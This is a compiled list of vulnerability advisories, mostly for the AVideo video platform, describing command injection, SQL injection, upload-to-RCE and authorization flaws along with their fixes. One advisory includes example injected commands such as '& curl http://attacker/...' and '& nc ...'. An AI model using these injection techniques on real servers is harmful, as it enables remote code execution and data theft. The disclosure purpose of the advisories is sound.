WWBN AVideo is an open source video platform. In 29.0 and earlier, there is a classic shell-metacharacter injection. The YPTSocket notification branch in plugin/Live/on_publish.php builds an execAsync() command line by string concatenation, single-quoting each argument but never calling escapeshellarg(). A ' in any of the three interpolated values ($users_id, $m3u8, $obj->liveTransmitionHistory_id) closes the quoted token and lets the attacker append arbitrary commands.
An os command injection vulnerability exists in the aVideoEncoder wget functionality of WWBN AVideo 11.6 and dev master commit 3f7c0364. A specially-crafted HTTP request can lead to arbitrary command execution. An attacker can send an HTTP request to trigger this vulnerability.
An OS command injection vulnerability exists in the aVideoEncoder chunkfile functionality of WWBN AVideo 11.6 and dev master commit 3f7c0364. A specially-crafted HTTP request can lead to arbitrary command execution. An attacker can send an HTTP request to trigger this vulnerability.
AVideo is an open source video platform. Prior to version 12.4, an OS Command Injection vulnerability in an authenticated endpoint `/plugin/CloneSite/cloneClient.json.php` allows attackers to achieve Remote Code Execution. This issue is fixed in version 12.4.
AVideo versions prior to 20.1 permit any authenticated user to upload comment images to videos owned by other users. The endpoint validates authentication but omits ownership checks, allowing attackers to perform unauthorized uploads to arbitrary video objects.
AVideo versions prior to 20.1 allow any authenticated user to upload files into directories belonging to other users due to an insecure direct object reference. The upload functionality verifies authentication but does not enforce ownership checks.
A race condition vulnerability exists in the aVideoEncoder.json.php unzip functionality of WWBN AVideo 14.4 and dev master commit 8a8954ff. A series of specially crafted HTTP request can lead to arbitrary code execution.
A sql injection vulnerability exists in the ObjectYPT functionality of WWBN AVideo 11.6 and dev master commit 3f7c0364. A specially-crafted HTTP request can lead to a SQL injection. An attacker can send an HTTP request to trigger this vulnerability. This vulnerability exists in the CloneSite plugin, allowing an attacker to inject SQL by manipulating the url parameter.
A sql injection vulnerability exists in the ObjectYPT functionality of WWBN AVideo 11.6 and dev master commit 3f7c0364. A specially-crafted HTTP request can lead to a SQL injection. An attacker can send an HTTP request to trigger this vulnerability. This vulnerability exists in the aVideoEncoder functionality which can be used to add new videos, allowing an attacker to inject SQL by manipulating the videoDownloadedLink or duration parameter.
A sql injection vulnerability exists in the ObjectYPT functionality of WWBN AVideo 11.6 and dev master commit 3f7c0364. A specially-crafted HTTP request can lead to a SQL injection. An attacker can send an HTTP request to trigger this vulnerability. This vulnerability exists in the Live Schedules plugin, allowing an attacker to inject SQL by manipulating the title parameter.
An improper password check exists in the login functionality of WWBN AVideo 11.6 and dev master commit 3f7c0364. An attacker that owns a users' password hash will be able to use it to directly login into the account, leading to increased privileges.
A sql injection vulnerability exists in the ObjectYPT functionality of WWBN AVideo 11.6 and dev master commit 3f7c0364. A specially-crafted HTTP request can lead to a SQL injection. An attacker can send an HTTP request to trigger this vulnerability. This vulnerability exists in the Live Schedules plugin, allowing an attacker to inject SQL by manipulating the description parameter.
WWBN AVideo is an open source video platform. In versions up to and including 26.0, in `objects/like.php`, the `getLike()` method constructs a SQL query using a prepared statement placeholder (`?`) for `users_id` but directly concatenates `$this->videos_id` into the query string without parameterization. An attacker who can control the `videos_id` value (via a crafted request) can inject arbitrary SQL, bypassing the partial prepared-statement protection. Commit 0215d3c4f1ee748b8880254967b51784b8ac4080 contains a patch.
AVideo is a video-sharing Platform. Versions prior to 8.0 contain a SQL Injection vulnerability in the getSqlFromPost() method of Object.php. The $_POST['sort'] array keys are used directly as SQL column identifiers inside an ORDER BY clause. Although real_escape_string() was applied, it only escapes string-context characters (quotes, null bytes) and provides no protection for SQL identifiers — making it entirely ineffective here. This issue has been fixed in version 8.0. To workaround this issue without upgrading, operators can apply a WAF rule to block POST requests where any sort[*] key contains characters outside [A-Za-z0-9_]. Alternatively, restrict access to the queue view (queue.json.php, index.php) to trusted IP ranges only.
WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `remindMe.json.php` endpoint passes `$_REQUEST['live_schedule_id']` through multiple functions without sanitization until it reaches `Scheduler_commands::getAllActiveOrToRepeat()`, which directly concatenates it into a SQL `LIKE` clause. Although intermediate functions (`new Live_schedule()`, `getUsers_idOrCompany()`) apply `intval()` internally, they do so on local copies within `ObjectYPT::getFromDb()`, leaving the original tainted variable unchanged. Any authenticated user can perform time-based blind SQL injection to extract arbitrary database contents. Commit 75d45780728294ededa1e3f842f95295d3e7d144 contains a patch.
WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `downloadVideoFromDownloadURL()` function in `objects/aVideoEncoder.json.php` saves remote content to a web-accessible temporary directory using the original URL's filename and extension (including `.php`). By providing an invalid `resolution` parameter, an attacker triggers an early `die()` via `forbiddenPage()` before the temp file can be moved or cleaned up, leaving an executable PHP file persistently accessible under the web root at `videos/cache/tmpFile/`. Commit 6da79b43484099a0b660d1544a63c07b633ed3a2 contains a patch.
WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `ImageGallery::saveFile()` method validates uploaded file content using `finfo` MIME type detection but derives the saved filename extension from the user-supplied original filename without an allowlist check. An attacker can upload a polyglot file (valid JPEG magic bytes followed by PHP code) with a `.php` extension. The MIME check passes, but the file is saved as an executable `.php` file in a web-accessible directory, achieving Remote Code Execution. Commit 345a8d3ece0ad1e1b71a704c1579cbf885d8f3ae contains a patch.
WWBN AVideo is an open source video platform. Prior to version 24.0, an authenticated Remote Code Execution (RCE) vulnerability was identified in AVideo related to the plugin upload/import functionality. The issue allowed an authenticated administrator to upload a specially crafted ZIP archive containing executable server-side files. Due to insufficient validation of extracted file contents, the archive was extracted directly into a web-accessible plugin directory, allowing arbitrary PHP code execution. This issue has been patched in version 24.0.
AVideo Platform is an open-source Audio and Video platform. It is similar to a self-hosted YouTube. In AVideo Platform before version 10.2 there is an authorization bypass vulnerability which enables an ordinary user to get admin control. This is fixed in version 10.2. All queries now remove the pass hash and the recoverPass hash.
An insufficient entropy vulnerability exists in the userRecoverPass.php recoverPass generation functionality of WWBN AVideo dev master commit 15fed957fb. A specially crafted HTTP request can lead to an arbitrary user password recovery. An attacker can send an HTTP request to trigger this vulnerability.
A unrestricted php file upload vulnerability exists in the import.json.php temporary copy functionality of WWBN AVideo dev master commit 15fed957fb. A specially crafted HTTP request can lead to arbitrary code execution when chained with an LFI vulnerability. An attacker can send a series of HTTP requests to trigger this vulnerability.
The import.json.php file before 8.9 for Avideo is vulnerable to a File Deletion vulnerability. This allows the deletion of configuration.php, which leads to certain privilege checks not being in place, and therefore a user can escalate privileges to admin.
WWBN AVideo is an open source video platform. In versions 12.4 and prior, a command injection vulnerability exists at `plugin/CloneSite/cloneClient.json.php` which allows Remote Code Execution if you CloneSite Plugin. This is a bypass to the fix for CVE-2023-30854, which affects WWBN AVideo up to version 12.3. This issue is patched in commit 1df4af01f80d56ff2c4c43b89d0bac151e7fb6e3.
AVideo through 29.0 contains an OS command injection vulnerability in the ffmpeg.json.php endpoint where notifyCode and callback parameters are concatenated into a shell command without escaping. Attackers who can craft a valid encrypted payload can inject arbitrary shell metacharacters into these fields to execute OS commands as the web-server user.
AVideo through 29.0 contains an OS command injection vulnerability in plugin/API/standAlone/functions.php where the listFFmpegProcesses() function interpolates unsanitized keyword parameters inside single quotes without escaping. Attackers who can craft a valid encrypted codeToExec payload can break out of the single-quoted grep context and execute arbitrary OS commands as the web-server user.
WWBN AVideo is an open source video platform. Versions 29.0 and below remain vulnerable to OS command injection because the fix for CVE-2026-33482 was incomplete and still does not neutralize a single & ( the shell background operator). CVE-2026-33482 reported that sanitizeFFmpegCommand() (plugin/API/standAlone/functions.php) failed to strip $(...) command substitution, allowing OS command injection at the execAsync() sh -c sink. The fix (commit 25c8ab90) added $, (, ), {, }, \n, \r to the denylist character class and a str_replace('&&', '', ...), but did not account for the single &. ffmpeg.json.php builds the command from _decryptString(getInput('codeToExecEncrypted')). This is the same threat model the original advisory accepted (“an attacker who can craft a valid encrypted payload can achieve arbitrary command execution on the standalone encoder server”) and the same CVSS basis (AV:N/AC:H/PR:N). Multiple &-separated commands can be chained (e.g. download + execute). Redirect-based payloads are blocked by the > strip, but command execution (e.g. & curl http://attacker/..., & nc ..., dropping/running a file) is not. This issue has been patched by this commit: https://github.com/WWBN/AVideo/commit/c1cfa2bea8a351a1d07f5758f82887403e3abf1f.
WWBN AVideo is an open source video platform. In versions up to and including 29.0, an incomplete fix for AVideo's `test.php` adds `escapeshellarg` for wget but leaves the `file_get_contents` and `curl` code paths unsanitized, and the URL validation regex `/^http/` accepts strings like `httpevil[.]com`. Commit 78bccae74634ead68aa6528d631c9ec4fd7aa536 contains an updated fix.
WWBN AVideo is an open source video platform. In versions up to and including 26.0, multiple vulnerabilities in AVideo's CloneSite plugin chain together to allow a completely unauthenticated attacker to achieve remote code execution. The `clones.json.php` endpoint exposes clone secret keys without authentication, which can be used to trigger a full database dump via `cloneServer.json.php`. The dump contains admin password hashes stored as MD5, which are trivially crackable. With admin access, the attacker exploits an OS command injection in the rsync command construction in `cloneClient.json.php` to execute arbitrary system commands. Commit c85d076375fab095a14170df7ddb27058134d38c contains a patch.
WWBN AVideo is an open source video platform. Prior to version 26.0, the `uploadVideoToLinkedIn()` method in the SocialMediaPublisher plugin constructs a shell command by directly interpolating an upload URL received from LinkedIn's API response, without sanitization via `escapeshellarg()`. If an attacker can influence the LinkedIn API response (via MITM, compromised OAuth token, or API compromise), they can inject arbitrary OS commands that execute as the web server user. Version 26.0 contains a fix for the issue.
WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `sanitizeFFmpegCommand()` function in `plugin/API/standAlone/functions.php` is designed to prevent OS command injection in ffmpeg commands by stripping dangerous shell metacharacters (`&&`, `;`, `|`, `` ` ``, `<`, `>`). However, it fails to strip `$()` (bash command substitution syntax). Since the sanitized command is executed inside a double-quoted `sh -c` context in `execAsync()`, an attacker who can craft a valid encrypted payload can achieve arbitrary command execution on the standalone encoder server. Commit 25c8ab90269e3a01fb4cf205b40a373487f022e1 contains a patch.
AVideo is a video-sharing Platform software. Prior to version 7.0, an unauthenticated attacker can execute arbitrary OS commands on the server by injecting shell command substitution into the base64Url GET parameter. This can lead to full server compromise, data exfiltration (e.g., configuration secrets, internal keys, credentials), and service disruption. This issue has been patched in version 7.0.
AVideo before 29.0 contains an incomplete fix for CVE-2026-45578 where execAsync() re-wraps escaped commands in double-quoted sh -c, allowing command substitution via $() and backticks. Attackers can inject arbitrary OS commands through the Live plugin on_publish.php endpoint despite escapeshellarg() protection.
OS injection vulnerability in World Wide Broadcast Network AVideo version before 12.4, allows attackers to execute arbitrary code via the video link field to the Embed a video link feature.
Beekeeper Studio versions prior to 3.9.9 allows a remote authenticated attacker to execute arbitrary JavaScript code with the privilege of the application on the PC where the affected product is installed. As a result, an arbitrary OS command may be executed as well.
The post-authentication command injection vulnerability in the CLI command of Zyxel ATP series firmware versions 4.32 through 5.35, USG FLEX series firmware versions 4.50 through 5.35, USG FLEX 50(W) firmware versions 4.16 through 5.35, USG20(W)-VPN firmware versions 4.16 through 5.35, and VPN series firmware versions 4.30 through 5.35, which could allow an authenticated attacker to execute some OS commands remotely.
An OS command injection vulnerability exists in the admin.cgi MVPN_trial_init functionality of peplink Surf SOHO HW1 v6.3.5 (in QEMU). A specially crafted HTTP request can lead to command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.
The Xiaomi router AX9000 has a post-authentication command injection vulnerability. This vulnerability is caused by the lack of input filtering, allowing an attacker to exploit it to obtain root access to the device.
OS command injection vulnerability in the mail setting page of SolarView Compact SV-CPT-MC310 versions prior to Ver.8.10 and SV-CPT-MC310F versions prior to Ver.8.10 allows remote authenticated attackers to execute an arbitrary OS command.
An OS command injection vulnerability exists in the admin.cgi USSD_send functionality of peplink Surf SOHO HW1 v6.3.5 (in QEMU). A specially crafted HTTP request can lead to command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.
Nextcloud server is an open source home cloud implementation. In affected versions a missing scope validation allowed users to create workflows which are designed to be only available for administrators. Some workflows are designed to be RCE by invoking defined scripts, in order to generate PDFs, invoking webhooks or running scripts on the server. Due to this combination depending on the available apps the issue can result in a RCE at the end. It is recommended that the Nextcloud Server is upgraded to 24.0.10 or 25.0.4. Users unable to upgrade should disable app `workflow_scripts` and `workflow_pdf_converter` as a mitigation.
Sme.UP ERP TOKYO V6R1M220406 was discovered to contain an OS command injection vulnerability via calls made to the XMService component.
OS command injection vulnerability in the download page of SolarView Compact SV-CPT-MC310 versions prior to Ver.8.10 and SV-CPT-MC310F versions prior to Ver.8.10 allows a remote authenticated attacker to execute an arbitrary OS command.
IPFire versions prior to 2.29 (Core Update 198) contain a command injection vulnerability that allows an authenticated attacker to execute arbitrary commands as the user 'nobody' via multiple parameters when creating a Proxy report. When a user creates a Proxy report the application issues an HTTP POST to /cgi-bin/logs.cgi/calamaris.dat and reads the values of DAY_BEGIN, MONTH_BEGIN, YEAR_BEGIN, DAY_END, MONTH_END, YEAR_END, NUM_DOMAINS, PERF_INTERVAL, NUM_CONTENT, HIST_LEVEL, NUM_HOSTS, NUM_URLS, and BYTE_UNIT, which are interpolated directly into the shell invocation of the mkreport helper. Because these parameters are never sanitized for improper characters or constructs, a crafted POST can inject shell metacharacters into one or more fields, causing arbitrary commands to run with the privileges of the 'nobody' user.
PraisonAI versions before 4.6.78 contain an allowlist bypass vulnerability in shell command execution that allows attackers to execute restricted commands via find's built-in -exec, -execdir, and -delete actions. Attackers can craft find commands with these built-in actions to read blocked files, delete files, or execute non-allowlisted binaries without triggering shell metacharacter filters.
An issue found in D-Link DSL-3782 v.1.03 allows remote authenticated users to execute arbitrary code as root via the network settings page.
AudioCodes Fax Server and Auto-Attendant IVR appliances versions up to and including 2.6.23 expose an authenticated command injection vulnerability in the license activation workflow handled by AudioCodes_files/ActivateLicense.php. When a license file is uploaded, the application derives a new filename by combining a generated base name with the attacker-controlled extension portion of the original upload name, then constructs a command line for fax_server_lic_cmdline.exe that includes this path. The extension value is incorporated into the command string without input validation, escaping, or proper argument quotation before being passed to exec(). An authenticated user with access to the license upload interface can supply a specially crafted filename whose extension injects additional shell metacharacters, causing arbitrary commands to be executed as NT AUTHORITY\\SYSTEM.
mailcow is a dockerized email package, with multiple containers linked in one bridged network. The Sync Job feature - which can be made available to standard users by assigning them the necessary permission - suffers from a shell command injection. A malicious user can abuse this vulnerability to obtain shell access to the Docker container running dovecot. The imapsync Perl script implements all the necessary functionality for this feature, including the XOAUTH2 authentication mechanism. This code path creates a shell command to call openssl. However, since different parts of the specified user password are included without any validation, one can simply execute additional shell commands. Notably, the default ACL for a newly-created mailcow account does not include the necessary permission. The Issue has been fixed within the 2023-03 Update (March 3rd 2023). As a temporary workaround the Syncjob ACL can be removed from all mailbox users, preventing from creating or changing existing Syncjobs.
SAP Business Object (Adaptive Job Server) - versions 420, 430, allows remote execution of arbitrary commands on Unix, when program objects execution is enabled, to authenticated users with scheduling rights, using the BI Launchpad, Central Management Console or a custom application based on the public java SDK. Programs could impact the confidentiality, integrity and availability of the system.
A command injection vulnerability exists in the AOS-CX Operating System. Successful exploitation could allow an authenticated remote attacker to conduct a Remote Code Execution (RCE) on the affected system.
IPFire versions prior to 2.29 (Core Update 198) contain a command injection vulnerability that allows an authenticated attacker to execute arbitrary commands as the 'nobody' user via the BE_NAME parameter when installing a blacklist. When a blacklist is installed the application issues an HTTP POST to /cgi-bin/urlfilter.cgi and interpolates the value of BE_NAME directly into a shell invocation without appropriate sanitation. Crafted input can inject shell metacharacters, leading to arbitrary command execution in the context of the 'nobody' user.
